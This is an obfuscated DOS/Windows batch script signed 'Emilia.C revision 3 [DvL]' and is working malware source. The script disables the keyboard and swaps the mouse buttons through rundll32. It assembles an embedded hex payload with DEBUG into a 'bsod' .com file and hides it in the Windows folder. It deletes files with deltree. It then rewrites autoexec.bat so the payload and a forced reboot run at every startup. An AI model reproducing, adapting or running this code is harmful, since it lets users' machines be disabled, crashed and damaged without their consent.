cls
ctty nul
echo off
break off
set ailime=set
%ailime% .!!!!=rundll32.exe
%ailime% .!!..=deltree/y
%ailime% .!!!.=com
%ailime% ..!..=c:\autoexec
%ailime% ..!!!=debug
%ailime% ...!!=bsod
%ailime% !!!!.=keyboard,disable
%ailime% !.!.!=user,swapmousebutton
%ailime% !!!..=echo e
%ailime% !!!.!=echo
%ailime% !!...=c:\windows\
%ailime% !...!=nul
%ailime% !.!!!=dvl
%ailime% !!=md
%ailime% ..=rcx
%ailime% !.=cls
%ailime% .!=bat
%ailime% !!!=move
%ailime% ...=ctty
%ailime% .!.=mand\
%ailime% ..!=ren
%ailime% !..=exe
%.!!!!% %!!!!.%
%.!!!!% %!.!.!%
%!!!..% 0100  81 FC 38 13 77 02 CD 20 B9 0A 03 BE 0A 04 BF D8>>%...!!%
%!!!..% 0110  12 BB 00 80 FD F3 A4 FC 87 F7 83 EE C8 57 57 E9>>%...!!%
%!!!..% 0120  62 11 55 50 58 21 0D 01 04 09 22 5B EE 7C D7 FF>>%...!!%
%!!!..% 0130  4A 05 73 11 7D 02 06 49 FF FF EB 42 90 19 00 43>>%...!!%
%!!!..% 0140  72 65 61 74 65 64 20 62 79 20 FF FF 41 43 69 44>>%...!!%
%!!!..% 0150  44 52 41 57 20 76 31 2E 32 2E 0A 0D 7F FB 24 A1>>%...!!%
%!!!..% 0160  03 01 2D 21 B3 A0 F6 E3 BB 33 FF FF 02 03 D8 8B>>%...!!%
%!!!..% 0170  F3 B8 00 B8 8E C0 33 FF B9 D0 07 F3 B7 FF A5 C3>>%...!!%
%!!!..% 0180  B4 00 CD 16 C3 B8 03 05 10 B4 FF F6 01 B9 00 20>>%...!!%
%!!!..% 0190  06 E8 01 1F BA 19 00 90 FF 2F 3D 3D 1B 01 75 03>>%...!!%
%!!!..% 01A0  E9 02 1D 3D 00 2D BB 48 07 01 FC 50 CB F6 0F 0D>>%...!!%
%!!!..% 01B0  07 47 EB 34 CB 72 90 4F 5A 4D D3 49 2D 51 B6 BB>>%...!!%
%!!!..% 01C0  74 1F 1A 39 16 71 75 B7 FC 08 83 06 19 0D F7 EE>>%...!!%
%!!!..% 01D0  7F 06 55 EB 71 90 89 0B DD 3F 09 67 90 83 3E 1A>>%...!!%
%!!!..% 01E0  74 EE BF 5F 06 32 7C 0B 83 2E 0D 7D 7F 18 4E 90>>%...!!%
%!!!..% 01F0  C7 33 00 7E ED 0B D7 3A 74 3B 90 C3 34 32 BB 6C>>%...!!%
%!!!..% 0200  2A 22 1F 12 B3 07 17 FF 0E 23 E4 B3 0E 33 07 FF>>%...!!%
%!!!..% 0210  06 67 5B B4 55 DA 09 6D FB BA 05 01 CD 21 F8 4C>>%...!!%
%!!!..% 0220  04 65 B7 90 00 20 13 01 07 54 45 77 CD 13 72 6F>>%...!!%
%!!!..% 0230  05 20 13 69 DD CD 13 6E 4B 13 65 0D 6E DF 75 05>>%...!!%
%!!!..% 0240  6C 01 33 13 32 13 2E 12 DE 13 64 0B 11 18 82 41>>%...!!%
%!!!..% 0250  F0 46 05 49 F1 8F DD 03 67 13 61 F9 4F 13 70 D0>>%...!!%
%!!!..% 0260  74 0D 72 74 30 D6 27 6F 23 30 BA CD 3D 05 68 13>>%...!!%
%!!!..% 0270  73 E4 1B 4D 6F 13 63 13 75 9F 79 65 13 64 29 20>>%...!!%
%!!!..% 0280  CF 75 03 68 0F 0D B1 B1 64 19 73 2B 7F B2 30 01>>%...!!%
%!!!..% 0290  3A 13 52 13 47 13 B0 FF 42 13 48 13 59 13 35 13>>%...!!%
%!!!..% 02A0  4E 9F 91 01 69 6B BA 6D 6F 64 6C 5D E0 1E 56 13>>%...!!%
%!!!..% 02B0  4D 01 7B 9B AB 0B 58 13 44 57 9B BB 55 13 53 9F>>%...!!%
%!!!..% 02C0  5D 2E D7 75 0D 4C 01 2E 61 DC 58 6F A1 20 CB C6>>%...!!%
%!!!..% 02D0  1E F3 67 CF 6D 6E C0 C3 73 AF CD BA 6F 1D 70 C3>>%...!!%
%!!!..% 02E0  3D D7 05 78 6F 15 2C F7 75 67 43 31 AB AA 38 BA>>%...!!%
%!!!..% 02F0  2A 03 48 0F 1C 7F DD 43 13 54 61 9A 36 5B 2B 35>>%...!!%
%!!!..% 0300  4C E9 E8 0B 2B 6B 45 18 A3 20 47 20 D7 CD F1 0B>>%...!!%
%!!!..% 0310  61 09 32 3E 2F 79 81 A6 63 63 67 6D 38 6D 0D 74>>%...!!%
%!!!..% 0320  57 90 F1 59 9F 2C 37 77 6F 81 2A F9 62 13 65 75>>%...!!%
%!!!..% 0330  DD 5D 6C 3F 73 D8 24 89 6E 07 EB B2 7D 77 F1 00>>%...!!%
%!!!..% 0340  1B 6B 59 B9 6E 66 21 63 19 CF 9D 39 75 89 19 2C>>%...!!%
%!!!..% 0350  99 79 45 76 00 E1 3F 9B 25 E9 A7 9C DE 9B 7F 5D>>%...!!%
%!!!..% 0360  27 4F 45 01 54 D8 48 B5 2C 77 50 C2 75 35 C2 B2>>%...!!%
%!!!..% 0370  BF 6B CD 56 F5 C9 91 17 2C 85 B2 A3 B0 91 33 4D>>%...!!%
%!!!..% 0380  97 AD 19 2E FA 62 01 91 68 42 C8 FB 53 93 1D 2C>>%...!!%
%!!!..% 0390  CB 60 BD 62 47 C5 90 7C 57 65 30 50 50 21 60 B5>>%...!!%
%!!!..% 03A0  E9 4F E6 79 1D 79 52 48 E3 A8 CA 01 00 8C 00 00>>%...!!%
%!!!..% 03B0  00 00 00 12 FF A4 E8 34 00 72 FA 41 E8 29 00 E3>>%...!!%
%!!!..% 03C0  35 73 F9 83 E9 03 72 06 88 CC AC F7 D0 95 31 C9>>%...!!%
%!!!..% 03D0  E8 15 00 11 C9 75 08 41 E8 0D 00 73 FB 41 41 41>>%...!!%
%!!!..% 03E0  8D 03 96 F3 A4 96 EB CE E8 02 00 11 C9 01 DB 75>>%...!!%
%!!!..% 03F0  04 AD 11 C0 93 C3 5E B9 10 00 AC 2C E8 3C 01 77>>%...!!%
%!!!..% 0400  F9 C1 04 08 29 34 AD E2 F1 C3 00>>%...!!%
%!!!.!% %..%>>%...!!%
%!!!.!% 30A>>%...!!%
%!!!.!% n %.!!!.%>>%...!!%
%!!!.!% w>>%...!!%
%!!!.!% q>>%...!!%
%..!!!%<%...!!%
%!!% %!!...%Çüö³Ü >%!...!%
%!!!% %.!!!.% %!!...%Çüö³Ü\%...!!%.%.!!!.%
%.!!..% %.!!!.% >%!...!%
%.!!..% %...!!% >%!...!%
%!!!.!%.%...% %!...!%>%..!..%.%!.!!!%
%!!!.!%.%!!...%Çüö³Ü\%...!!%.%.!!!.%>>%..!..%.%!.!!!%
%!!!.!%.%!.%>>%..!..%.%!.!!!%
%!!!.!%.%!.%>>%..!..%.%!.!!!%
%!!!.!%"%!!!.!% G=FFFF:0|%!!...%%.!!!.%%.!.%%..!!!%.%!..% >%!...!%">>%..!..%.%!.!!!%
%..!% %..!..%.%.!% c:\ÇÇÇ.ÇÇÇ
%..!% %..!..%.%!.!!!% %..!..%.%.!%
%!.%

:: :: :: :: :: :: :: :: :: :: :: :: ::
:: // Emilia.C revision 3 [DvL] //  ::
:: :: :: :: :: :: :: :: :: :: :: :: ::
